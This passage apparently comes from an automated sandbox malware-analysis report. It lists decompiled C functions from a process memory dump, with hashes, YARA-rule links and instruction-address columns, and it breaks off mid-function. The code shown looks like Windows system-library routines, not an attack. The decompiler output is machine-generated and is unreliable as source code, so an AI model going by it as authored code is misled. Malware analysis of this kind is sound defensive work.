                                                    0x04b74c79
                                                    0x04b74c7e
                                                    0x04b74c89
                                                    0x04b74c8b
                                                    0x04b74c8f
                                                    0x04b74c8f
                                                    0x00000000
                                                    0x04b74c89
                                                    0x04bb67c3
                                                    0x00000000
                                                    0x04bb67c3
                                                    0x04bb67af
                                                    0x04b74c73
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 005ac7cdb3f5df88f8f64af5ce0629a64a55d675d15a81a22627129b70605e5f
                                                    • Instruction ID: b4ce2957c8fbfd533f04e9b54696a26448974f1972a76bfb7200d21444c4abe7
                                                    • Opcode Fuzzy Hash: 005ac7cdb3f5df88f8f64af5ce0629a64a55d675d15a81a22627129b70605e5f
                                                    • Instruction Fuzzy Hash: 6C41A235A002289BDB21DF68C940BEAB7B4EF45710F0105E9ED49AB241DB78FE84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B58A0A, Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E04B58A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4c3d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04B8B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04B5E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4b21180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04B71DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04B83C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04B58999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                    0x04b58a0a
                                                    0x04b58a1c
                                                    0x04b58a23
                                                    0x04b58a2e
                                                    0x04b58a30
                                                    0x04b58a36
                                                    0x04b58a3c
                                                    0x04b58a3e
                                                    0x04b58a4a
                                                    0x04b58a52
                                                    0x04b58a9c
                                                    0x04b58aae
                                                    0x04b58a58
                                                    0x04b58a5e
                                                    0x04b58a6a
                                                    0x04b58a6f
                                                    0x04b58a75
                                                    0x04b58a7d
                                                    0x04b58a85
                                                    0x04b58a86
                                                    0x04b58a89
                                                    0x04b58a93
                                                    0x04b58a99
                                                    0x04b58a9b
                                                    0x00000000
                                                    0x04b58aaf
                                                    0x04b58abe
                                                    0x04b58ac3
                                                    0x04b58acb
                                                    0x04b58ad7
                                                    0x04b58ae0
                                                    0x04b58af1
                                                    0x00000000
                                                    0x04b58af1
                                                    0x04b58acd
                                                    0x04b58ad5
                                                    0x04b58afb
                                                    0x04b58afd
                                                    0x04b58aff
                                                    0x04b58b07
                                                    0x04b58b22
                                                    0x04b58b24
                                                    0x04b58b2a
                                                    0x04b58b2e
                                                    0x04b58b3f
                                                    0x04b58b78
                                                    0x04b58b41
                                                    0x04b58b52
                                                    0x04b58b54
                                                    0x04b58b5c
                                                    0x04b58b74
                                                    0x04b58b74
                                                    0x04b58b5c
                                                    0x04b58b3f
                                                    0x04b58b5e
                                                    0x04b58b61
                                                    0x04b58b64
                                                    0x04b58b64
                                                    0x04b58b6c
                                                    0x04b58b6c
                                                    0x04b58b11
                                                    0x04ba9cd5
                                                    0x04ba9cd5
                                                    0x04b58b17
                                                    0x04b58b1a
                                                    0x04b58b1a
                                                    0x00000000
                                                    0x04b58ad5
                                                    0x04b58a89

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 75fea45aafb0caa876e2fdd547cbfaaf89ecffff8a31f4d3b77431357918ba4d
                                                    • Instruction ID: 8790caabf52d0fd1ed2337fe04c28ec8f1f6c0f0be1f1ea14e07f47a31d5ebef
                                                    • Opcode Fuzzy Hash: 75fea45aafb0caa876e2fdd547cbfaaf89ecffff8a31f4d3b77431357918ba4d
                                                    • Instruction Fuzzy Hash: CF415FB5A002289BDB24EF19C888BA9F3F8EF44300F1045E9DD19D7261E771AE91CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C0FDE2, Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E04C0FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E04C0FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E04C10A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04B67D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04C01608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E04C12B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E04C0C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E04C0DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04B67D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E04C0A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                    0x04c0fde7
                                                    0x04c0fde8
                                                    0x04c0fdec
                                                    0x04c0fdee
                                                    0x04c0fdf5
                                                    0x04c0fdf7
                                                    0x04c0fdfc
                                                    0x04c0fe19
                                                    0x04c0fe22
                                                    0x04c0fe26
                                                    0x04c0fec6
                                                    0x04c0fecd
                                                    0x04c0fed5
                                                    0x04c0fee7
                                                    0x04c0fed7
                                                    0x04c0fee0
                                                    0x04c0fee0
                                                    0x04c0feef
                                                    0x04c0ff00
                                                    0x04c0ff02
                                                    0x04c0ff07
                                                    0x04c0ff07
                                                    0x00000000
                                                    0x04c0feef
                                                    0x04c0fe33
                                                    0x04c0fe55
                                                    0x04c0fe59
                                                    0x04c0fe5b
                                                    0x04c0fe5e
                                                    0x04c0fe69
                                                    0x04c0fe6d
                                                    0x04c0fe6d
                                                    0x04c0fe69
                                                    0x04c0fe35
                                                    0x04c0fe41
                                                    0x04c0fe41
                                                    0x04c0fe79
                                                    0x04c0fe8b
                                                    0x04c0fe7b
                                                    0x04c0fe84
                                                    0x04c0fe84
                                                    0x04c0fe93
                                                    0x00000000
                                                    0x04c0fea8
                                                    0x04c0feba
                                                    0x00000000
                                                    0x04c0feba
                                                    0x04c0fdfe
                                                    0x04c0fe01
                                                    0x04c0fe02
                                                    0x04c0fe08
                                                    0x04c0ff0c
                                                    0x04c0ff14
                                                    0x04c0ff14

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction ID: a7ee45b4b5c4a93cd9098b16856100c1ff06c583909f5f1da6a81b6f18f5e581
                                                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction Fuzzy Hash: 40310532300640AFE3328B69C844F6AB7EBEB85744F18C55DE5468B3C1DAB4F981D710
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC69A6, Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E04BC69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4c3d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04B56C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04BC6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04B89980() >= 0) {
							E04B62280(_t56, 0x4c38778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4c38774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4c38774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04B4B6F0(0x4b2c338, 0x4b2c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04B89520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04B895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04B5FFB0(_t68, _t77, 0x4c38778);
				}
				_pop(_t78);
				return E04B8B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                    0x04bc69b5
                                                    0x04bc69be
                                                    0x04bc69c3
                                                    0x04bc69c9
                                                    0x04bc69cc
                                                    0x04bc69d1
                                                    0x04bc69d3
                                                    0x04bc69de
                                                    0x04bc69e1
                                                    0x04bc69ea
                                                    0x04bc69f6
                                                    0x04bc69fe
                                                    0x04bc6a13
                                                    0x04bc6a14
                                                    0x04bc6a15
                                                    0x04bc6a16
                                                    0x04bc6a1e
                                                    0x04bc6a26
                                                    0x04bc6a31
                                                    0x04bc6a36
                                                    0x04bc6a37
                                                    0x04bc6a40
                                                    0x04bc6a49
                                                    0x04bc6a4a
                                                    0x04bc6a53
                                                    0x04bc6a59
                                                    0x04bc6a5d
                                                    0x04bc6a5e
                                                    0x04bc6a64
                                                    0x04bc6a67
                                                    0x04bc6a6a
                                                    0x04bc6a6d
                                                    0x04bc6a70
                                                    0x04bc6a77
                                                    0x04bc6a7d
                                                    0x04bc6a86
                                                    0x04bc6a89
                                                    0x04bc6a9c
                                                    0x04bc6a9f
                                                    0x04bc6aa2
                                                    0x04bc6aa5
                                                    0x04bc6aaf
                                                    0x04bc6ab1
                                                    0x04bc6ab8
                                                    0x04bc6ab9
                                                    0x04bc6abb
                                                    0x04bc6abe
                                                    0x04bc6ac5
                                                    0x04bc6ac5
                                                    0x04bc6aaf
                                                    0x04bc6a40
                                                    0x04bc6a26
                                                    0x04bc69fe
                                                    0x04bc6ace
                                                    0x04bc6ad0
                                                    0x04bc6ad3
                                                    0x04bc6ad8
                                                    0x04bc6adf
                                                    0x04bc6adf
                                                    0x04bc6ae8
                                                    0x04bc6aef
                                                    0x04bc6aef
                                                    0x04bc6af9
                                                    0x04bc6b06

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e8ea3ba845a9c9699450cb9e0a922160329034c6057639d7eb4fe1efa7df002
                                                    • Instruction ID: 924b162f46cba45f5befaf9f6f502042cbc25039639fc14d6a4670260d281207
                                                    • Opcode Fuzzy Hash: 1e8ea3ba845a9c9699450cb9e0a922160329034c6057639d7eb4fe1efa7df002
                                                    • Instruction Fuzzy Hash: 86416AB1D00208AFDB14DFA5D980BFEBBF4EF48714F0481AAF955A7250EB75A906CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B45210, Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E04B45210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04B452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04B895D0();
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04B5EB70(_t54, 0x4c379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04B895D0();
								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04B5EB70(_t54, 0x4c379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04B8F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04B5EB70(_t54, 0x4c379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04B895D0();
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                    0x04b45220
                                                    0x04b45224
                                                    0x04ba0d13
                                                    0x04ba0d16
                                                    0x04ba0d19
                                                    0x04b4522a
                                                    0x04b4522a
                                                    0x04b4522d
                                                    0x04b4522d
                                                    0x04b45231
                                                    0x04b45235
                                                    0x04b45239
                                                    0x04ba0d5c
                                                    0x04ba0d62
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba0d6a
                                                    0x04ba0d7b
                                                    0x04ba0d7f
                                                    0x04ba0d81
                                                    0x04ba0d84
                                                    0x04ba0d95
                                                    0x04ba0d95
                                                    0x04ba0d6c
                                                    0x04ba0d71
                                                    0x04ba0d71
                                                    0x04ba0d9a
                                                    0x00000000
                                                    0x04b4524a
                                                    0x04b4524a
                                                    0x04b45250
                                                    0x04ba0d24
                                                    0x04ba0d35
                                                    0x04ba0d39
                                                    0x04ba0d3b
                                                    0x04ba0d3e
                                                    0x04ba0d50
                                                    0x04ba0d50
                                                    0x04ba0d26
                                                    0x04ba0d2b
                                                    0x04ba0d2b
                                                    0x00000000
                                                    0x04ba0d55
                                                    0x04b45256
                                                    0x04b4525b
                                                    0x04b45265
                                                    0x04ba0da7
                                                    0x04b4526b
                                                    0x04b4526e
                                                    0x04b45272
                                                    0x04ba0db1
                                                    0x04ba0db4
                                                    0x04ba0dc5
                                                    0x04ba0dc5
                                                    0x04b45272
                                                    0x04b45278
                                                    0x04b4527e
                                                    0x04b4528a
                                                    0x04b4528c
                                                    0x04b4528d
                                                    0x00000000
                                                    0x04b45280
                                                    0x04b45282
                                                    0x04b45288
                                                    0x04b4529f
                                                    0x04b45292
                                                    0x00000000
                                                    0x04b45292
                                                    0x00000000
                                                    0x04b45288
                                                    0x04b4527e

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e512e7ca8790f26dc5ea967024a03b61d347990c31c1e850b15dee52c9a7668
                                                    • Instruction ID: e4814d7131e11b85c1b5d8863943788bffdc18371dd0563bb31aff42d6125a84
                                                    • Opcode Fuzzy Hash: 4e512e7ca8790f26dc5ea967024a03b61d347990c31c1e850b15dee52c9a7668
                                                    • Instruction Fuzzy Hash: A7314A32245B04EBCB31BF14C880B7A7765FF40764F1146AAE8560B9A0EB70F910E690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B83D43, Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B83D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04B57B60(0, _t61, 0x4b211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04B57B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04B64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                    0x04b83d4c
                                                    0x04b83d50
                                                    0x04b83d55
                                                    0x04b83d5e
                                                    0x04bbe79a
                                                    0x00000000
                                                    0x04bbe79a
                                                    0x04b83d68
                                                    0x04bbe789
                                                    0x04b83d9d
                                                    0x04b83da3
                                                    0x04b83daf
                                                    0x04b83db5
                                                    0x04b83dbc
                                                    0x04b83dc4
                                                    0x04b83dc9
                                                    0x04b83dce
                                                    0x04bbe7ae
                                                    0x04bbe7ae
                                                    0x04b83dde
                                                    0x04b83de2
                                                    0x04b83de7
                                                    0x04b83e0d
                                                    0x04b83e13
                                                    0x04b83e16
                                                    0x04b83e1e
                                                    0x04b83e25
                                                    0x04b83e28
                                                    0x00000000
                                                    0x00000000
                                                    0x04b83e2a
                                                    0x04b83e2f
                                                    0x04b83e37
                                                    0x04b83e37
                                                    0x00000000
                                                    0x04b83e37
                                                    0x04b83e31
                                                    0x00000000
                                                    0x04b83e31
                                                    0x04b83e20
                                                    0x04b83e20
                                                    0x04b83e35
                                                    0x00000000
                                                    0x04b83de9
                                                    0x04b83de9
                                                    0x04b83de9
                                                    0x04b83dee
                                                    0x04b83dfd
                                                    0x04b83dff
                                                    0x04b83e02
                                                    0x04b83e05
                                                    0x04b83e05
                                                    0x00000000
                                                    0x04b83df0
                                                    0x04b83de7
                                                    0x04bbe78f
                                                    0x04bbe794
                                                    0x04b83d79
                                                    0x04b83d84
                                                    0x04b83d89
                                                    0x04b83d8e
                                                    0x00000000
                                                    0x04bbe7a4
                                                    0x04b83d96
                                                    0x04b83d9a
                                                    0x00000000
                                                    0x04b83d9a
                                                    0x00000000
                                                    0x04bbe794
                                                    0x04b83d6e
                                                    0x04b83d73
                                                    0x00000000
                                                    0x04bbe7b5
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7915177f34729811a68378ceb9207e9ed3cfd0fd71484182c78996affa513b0d
                                                    • Instruction ID: fd850b4c4139bec4ecd7d5a60d9e4b268557ea81bbb678df2693c1b887c0c16a
                                                    • Opcode Fuzzy Hash: 7915177f34729811a68378ceb9207e9ed3cfd0fd71484182c78996affa513b0d
                                                    • Instruction Fuzzy Hash: F631B031701615DBC7259F2AD841A7BBBE5EF55B00B0594EEEC45CB360E772E840E7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7A61C, Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E04B7A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4c20220);
				E04B9D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4c37b9c; // 0x0
				_t55 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04B9D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4c37b10 =  *0x4c37b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4c3536c; // 0xca0d00
					if( *_t51 != 0x4c35368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4c35368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4c3536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
